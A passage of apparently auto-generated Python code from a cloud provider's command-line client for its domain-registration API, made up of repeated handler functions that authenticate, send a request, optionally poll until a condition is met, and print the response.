print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeDomainBaseInfo(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeDomainBaseInfoRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeDomainBaseInfo(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeBatchOperationLogDetails(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeBatchOperationLogDetailsRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeBatchOperationLogDetails(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteTemplateRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DeleteTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCheckDomain(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CheckDomainRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.CheckDomain(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doRenewDomainBatch(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.RenewDomainBatchRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.RenewDomainBatch(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeTemplateRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreatePhoneEmail(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreatePhoneEmailRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.CreatePhoneEmail(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeTemplateList(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeTemplateListRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeTemplateList(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeBatchOperationLogs(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeBatchOperationLogsRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeBatchOperationLogs(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doBatchModifyDomainInfo(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.BatchModifyDomainInfoRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.BatchModifyDomainInfo(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doTransferProhibitionBatch(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.TransferProhibitionBatchRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.TransferProhibitionBatch(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doTransferInDomainBatch(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.TransferInDomainBatchRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.TransferInDomainBatch(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doUpdateProhibitionBatch(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.UpdateProhibitionBatchRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.UpdateProhibitionBatch(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
